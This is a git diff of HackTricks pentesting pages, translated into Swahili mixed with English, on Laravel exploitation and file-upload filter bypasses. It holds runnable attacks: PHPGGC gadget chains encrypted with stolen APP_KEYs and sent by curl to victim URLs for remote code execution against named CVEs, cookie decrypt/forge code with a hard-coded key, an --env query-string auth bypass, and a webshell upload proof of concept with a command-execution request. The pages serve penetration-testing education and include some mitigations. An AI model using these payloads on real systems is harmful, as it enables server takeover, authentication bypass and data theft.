encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" @@ -45,25 +45,25 @@ laravel_crypto_killer.py decrypt -k -v # Try a word-list of keys against a token (offline) laravel_crypto_killer.py bruteforce -v -kf appkeys.txt ``` -The script inasaidia kwa uwazi payloads za CBC na GCM na inarejesha uwanja wa HMAC/tag. +Scripti inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag. --- -## Mifano halisi ya udhaifu +## Real-world vulnerable patterns -| Mradi | Kitu kilichoharibika | Mnyororo wa gadget | -|-------|----------------------|--------------------| +| Mradi | Sink dhaifu | Gadget chain | +|-------|-------------|--------------| | Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | -| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 | | Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | -Mchakato wa unyakuzi daima ni: -1. Pata au fanya brute-force ya `APP_KEY` ya byte 32. -2. Jenga mnyororo wa gadget na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`). -3. Ficha gadget iliyosajiliwa na **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana. -4. Toa ciphertext kwa sink iliyo hatarini `decrypt()` (parameta ya route, cookie, session …) ili kuanzisha **RCE**. +Mchakato wa unyonyaji ni daima: +1. Pata au jaribu kwa brute-force `APP_KEY` ya byte 32. +2. Jenga gadget chain na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`). +3. Encrypt serialized gadget kwa **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana. +4. Wasilisha ciphertext kwa sink dhaifu ya `decrypt()` (route parameter, cookie, session …) ili kusababisha **RCE**. -Hapa chini kuna mistari mifupi inayoonyesha njia kamili ya shambulio kwa kila CVE halisi iliyotajwa hapo juu: +Hapo chini kuna mistari fupi (one-liners) inayoonyesha njia kamili ya shambulio kwa kila CVE ya ulimwengu halisi iliyo tajwa hapo juu: ```bash # Invoice Ninja ≤5 – /route/{hash} php8.2 phpggc Laravel/RCE13 system id -b -f | \ @@ -80,41 +80,84 @@ php8.2 phpggc Laravel/RCE15 system id -b > payload.bin ./laravel_crypto_killer.py encrypt -k -v payload.bin --session_cookie= > forged.txt curl -H "Cookie: laravel_session=; =$(cat forged.txt)" https://victim/login ``` ---- +## Ugundaji mkubwa wa APP_KEY via cookie brute-force -## Ugunduzi wa APP_KEY wa Misa kupitia brute-force ya cookie - -Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinatoa mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao. +Kwa sababu kila majibu mapya ya Laravel huweka angalau cookie iliyofichwa (`XSRF-TOKEN` na kawaida `laravel_session`), **public internet scanners (Shodan, Censys, …) leak mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa offline. Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025): -* Dataset Julai 2024 » 580 k tokens, **3.99 % ya funguo zimevunjwa** (≈23 k) -* Dataset Mei 2025 » 625 k tokens, **3.56 % ya funguo zimevunjwa** -* >1 000 seva bado zina hatari kutokana na CVE-2018-15133 ya zamani kwa sababu tokens zina data iliyosimbwa moja kwa moja. -* Matumizi makubwa ya funguo – APP_KEYs 10 bora zimeandikwa kwa defaults ambazo zinakuja na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …). +* Dataset Julai 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k) +* Dataset Mei 2025 » 625 k tokens, **3.56 % keys cracked** +* >1 000 servers bado vulnerable to legacy CVE-2018-15133 kwa sababu tokens directly contain serialized data. +* Huge key reuse – the Top-10 APP_KEYs ni hard-coded defaults zilizoshipwa na commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …). -Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili hadi <2 dakika. +Chombo binafsi cha Go **nounours** kinaboresha AES-CBC/GCM bruteforce throughput hadi ~1.5 billion tries/s, kukata muda wa full dataset cracking chini ya <2 minutes. -## Hila za Laravel +## CVE-2024-52301 – HTTP argv/env override → auth bypass -### Hali ya Ukarabati +Wakati PHP’s `register_argc_argv=On` (kawaida kwenye distros nyingi), PHP inaonyesha array `argv` kwa HTTP requests inayotokana na query string. Matoleo ya hivi karibuni ya Laravel yalichambua hizi “CLI-like” args na kuzingatia `--env=` wakati wa runtime. Hii inaruhusu kubadilisha environment ya framework kwa HTTP request ya sasa kwa kuiongeza tu kwenye URL yoyote: -Ikiwa Laravel iko katika **hali ya ukarabati** utaweza kufikia **kod** na **data nyeti**.\ +- Quick check: +- Tembelea `https://target/?--env=local` au kamba yoyote na tazama mabadiliko yanayotegemea environment (debug banners, footers, verbose errors). Ikiwa kamba inaonekana reflected, override inafanya kazi. + +- Impact example (business logic trusting a special env): +- Ikiwa app ina matawi kama `if (app()->environment('preprod')) { /* bypass auth */ }`, unaweza kuthibitisha bila creds sahihi kwa kutuma login POST kwa: +- `POST /login?--env=preprod` + +- Notes: +- Inaenda kwa kila-request, hakuna persistence. +- Inahitaji `register_argc_argv=On` na vulnerable Laravel version inayosoma argv kwa HTTP. +- Primitive muhimu kuonyesha errors zaidi katika “debug” envs au kuamsha code paths zilizo gatwa na environment. + +- Mitigations: +- Zima `register_argc_argv` kwa PHP-FPM/Apache. +- Update Laravel ili isibris argv kwenye HTTP requests na ondoa assumptions za trust zinazohusiana na `app()->environment()` katika production routes. + +Minimal exploitation flow (Burp): +```http +POST /login?--env=preprod HTTP/1.1 +Host: target +Content-Type: application/x-www-form-urlencoded +... +email=a@b.c&password=whatever&remember=0xdf +``` +--- + +## Triki za Laravel + +### Hali ya debugging + +Ikiwa Laravel iko katika **debugging mode** utaweza kupata **code** na **sensitive data**.\ Kwa mfano `http://127.0.0.1:8000/profiles`: ![](<../../images/image (1046).png>) -Hii kwa kawaida inahitajika kwa ajili ya kutumia CVEs nyingine za RCE za Laravel. +Hali hii kawaida inahitajika kwa ku-exploit CVE nyingine za Laravel RCE. +### Fingerprinting & exposed dev endpoints + +Ukaguzi mfupi wa haraka kutambua stack ya Laravel na zana hatari za dev zilizo wazi katika production: + +- `/_ignition/health-check` → Ignition present (debug tool used by CVE-2021-3129). Ikiwa inafikika bila uthibitishaji, app inaweza kuwa katika debug au imepangwa vibaya. +- `/_debugbar` → Laravel Debugbar assets; mara nyingi inaashiria debug mode. +- `/telescope` → Laravel Telescope (dev monitor). Ikiwa ni public, tarajia ufichaji mkubwa wa taarifa na vitendo vinavyowezekana. +- `/horizon` → Queue dashboard; version disclosure na wakati mwingine vitendo vilivyolindwa na CSRF. +- `X-Powered-By`, cookies `XSRF-TOKEN` and `laravel_session`, and Blade error pages pia husaidia kutambulisha. +```bash +# Nuclei quick probe +nuclei -nt -u https://target -tags laravel -rl 30 +# Manual spot checks +for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done +``` ### .env -Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia njia fulani ya kupita: `/../.env` +Laravel huhifadhi APP inayotumiwa ku-encrypt cookies na taarifa nyingine za uthibitisho ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia path traversal chini ya: `/../.env` -Laravel pia itaonyesha habari hii ndani ya ukurasa wa ukarabati (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa). +Laravel pia itaonyesha taarifa hii ndani ya ukurasa wa debug (unaoonekana wakati Laravel inapata kosa na debug imewezeshwa). -Kwa kutumia APP_KEY ya siri ya Laravel unaweza kusimbua na kusimbua tena cookies: +Kwa kutumia APP_KEY ya siri ya Laravel unaweza decrypt na re-encrypt cookies: -### Futa Cookie +### Decrypt Cookie ```python import os import json @@ -169,30 +212,34 @@ return base64.b64encode(bytes(json.dumps(dic), 'utf-8')) app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k=' key = base64.b64decode(app_key) -decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9') -#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e' -encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}') +decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlxcL1JGY0t6YzhaaGNHR1duSktIdjF1elxcLzV4a3dUOElZVzMw aG01dGk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9') +#b'{"data":"a:6:{s:6:\"_token\";s:40:\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\";s:8:\"username\";s:8:\"guestc32\";s:5:\"order\";s:2:\"id\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e' +encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605141157}') ``` ### Laravel Deserialization RCE -Tofauti zinazoweza kutumika: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/)) +Toleo zilizo hatarini: 5.5.40 na 5.6.x hadi 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/)) -Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization hapa: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/) +Hapa unaweza kupata taarifa kuhusu deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/) -Unaweza kujaribu na kutumia kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ -Au unaweza pia kutumia metasploit: `use unix/http/laravel_token_unserialize_exec` +Unaweza kujaribu na kui-exploit ukitumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ +Au unaweza pia kui-exploit kwa kutumia metasploit: `use unix/http/laravel_token_unserialize_exec` ### CVE-2021-3129 -Udhaifu mwingine wa deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) +Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) -## References +## Marejeo * [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) * [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html) * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) * [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) +* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h) +* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301) +* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 3b0a3ab16..141a09a12 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -1,10 +1,10 @@ -# File Upload +# Kupakia Faili {{#include ../../banners/hacktricks-training.md}} -## File Upload General Methodology +## Mbinu za Jumla za Kupakia Faili -Other useful extensions: +Extensions nyingine muhimu: - **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_ - **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_ @@ -17,11 +17,11 @@ Other useful extensions: ### Bypass file extensions checks -1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._ -2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_ +1. Ikiwa zinatumika, **kagua** **extensions zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._ +2. _Kagua **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions zilizotajwa pia):_ - _file.png.php_ - _file.png.Php5_ -3. Try adding **special characters at the end.** You could use Burp to **bruteforce** all the **ascii** and **Unicode** characters. (_Note that you can also try to use the **previously** motioned **extensions**_) +3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa **ascii** na **Unicode** herufi. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa hapo awali_) - _file.php%20_ - _file.php%0a_ - _file.php%00_ @@ -31,7 +31,7 @@ Other useful extensions: - _file._ - _file.php...._ - _file.pHp5...._ -4. Try to bypass the protections **tricking the extension parser** of the server-side with techniques like **doubling** the **extension** or **adding junk** data (**null** bytes) between extensions. _You can also use the **previous extensions** to prepare a better payload._ +4. Jaribu kupita vizingiti kwa **kudanganya parser ya extension** upande wa server kwa mbinu kama **kuzidisha** **extension** au **kuongeza data taka** (bytes **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa hapo awali kutayarisha payload bora._ - _file.png.php_ - _file.png.pHp5_ - _file.php#.png_ @@ -40,18 +40,18 @@ Other useful extensions: - _file.php%0a.png_ - _file.php%0d%0a.png_ - _file.phpJunk123png_ -5. Add **another layer of extensions** to the previous check: +5. Ongeza **tabaka nyingine za extensions** kwa ukaguzi uliopita: - _file.png.jpg.php_ - _file.php%00.png%00.jpg_ -6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code): +6. Jaribu kuweka **exec extension before the valid extension** na kuomba server iwe misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code): - _ex: file.php.png_ -7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character ":” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. "file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The "**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.”) -8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php +7. Kutumia **NTFS alternate data stream (ADS)** kwenye **Windows**. Katika kesi hii, tabia ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Matokeo yake, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Mfano wa **::$data** pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya mfano huu pia inaweza kusaidia kupita vizingiti zaidi (mfano. "file.asp::$data.") +8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php ``` # Linux maximum 255 bytes /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255 -Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png +Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png # Upload the file and check response how many characters it alllows. Let's say 236 python -c 'print "A" * 232' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @@ -59,33 +59,63 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA<--SNIP 232 A-->AAA.php.png ``` +#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) – CVE-2024-21546 + +Baadhi ya upload handlers huondoa au ku-normalize nukta zilizofuatia kwenye jina la faili lililosalazwa. Katika UniSharp’s Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa: + +- Kutumia MIME ya picha halali na magic header (mfano, PNG’s `\x89PNG\r\n\x1a\n`). +- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`. +- Server huondoa nukta ya mwisho na kusababisha `shell.php` kuendelea kuwepo, ambayo itaendeshwa ikiwa imewekwa kwenye directory inayotumika kuwahudumia mtandao (default public storage like `/storage/files/`). + +Minimal PoC (Burp Repeater): +```http +POST /profile/avatar HTTP/1.1 +Host: target +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary + +------WebKitFormBoundary +Content-Disposition: form-data; name="upload"; filename="0xdf.php." +Content-Type: image/png + +\x89PNG\r\n\x1a\n +------WebKitFormBoundary-- +``` +Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM): +``` +GET /storage/files/0xdf.php?cmd=id +``` +Mitigations: +- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1. +- Lazimisha allowlists kali upande wa server na thibitisha tena jina la faili lililohifadhiwa. +- Hudumia uploads kutoka maeneo yasiyoweza kutekelezwa. + ### Bypass Content-Type, Magic Number, Compression & Resizing -- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_ +- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_ 1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt) -- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\ +- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (kumdanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\ `exiftool -Comment="' >> img.png` -- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**. +- Ikiwa **compression** inaongezwa kwenye picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu za hapo awali hazitakuwa na manufaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**. - [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php) -- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**. +- Ukurasa wa wavuti pia unaweza kuwa unafanya **resizing** ya **image**, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**. - [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php) -- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**. +- Mbinu nyingine ya kuunda payload inayoweza **kuishi baada ya image resizing**, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**. - [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php) ### Other Tricks to check -- Find a vulnerability to **rename** the file already uploaded (to change the extension). -- Find a **Local File Inclusion** vulnerability to execute the backdoor. -- **Possible Information disclosure**: -1. Upload **several times** (and at the **same time**) the **same file** with the **same name** -2. Upload a file with the **name** of a **file** or **folder** that **already exists** -3. Uploading a file with **".”, "..”, or "…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/” directory, the ".” filename will create a file called "uploads” in the "/www/” directory. -4. Upload a file that may not be deleted easily such as **"…:.jpg”** in **NTFS**. (Windows) -5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows) -6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9. -- Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim. +- Tafuta udhaifu wa **kubadilisha jina** (rename) kwa faili iliyopakuliwa tayari (kubadilisha extension). +- Tafuta udhaifu wa **Local File Inclusion** ili kutekeleza backdoor. +- **Uwezekano wa ufunuo wa taarifa**: +1. Pakia **mara kadhaa** (na kwa **wakati ule ule**) **faili ile ile** yenye **jina lile lile** +2. Pakia faili yenye **jina** la **file** au **folder** ambayo **tayari ipo** +3. Kupakia faili yenye **"." , ".." , au "…" kama jina lake**. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina "." itaumba faili inayoitwa "uploads" katika directory ya "/www/". +4. Pakia faili ambayo inaweza kuwa ngumu kufutwa kama **"…:.jpg"** katika **NTFS**. (Windows) +5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` ndani ya jina lake. (Windows) +6. Pakia faili katika **Windows** ukitumia majina **yaleyalo yaliyohifadhiwa** (reserved/forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9. +- Jaribu pia **kuupload executable** (.exe) au **.html** (inayoonekana kidogo) ambayo **itaweza kutekeleza code** 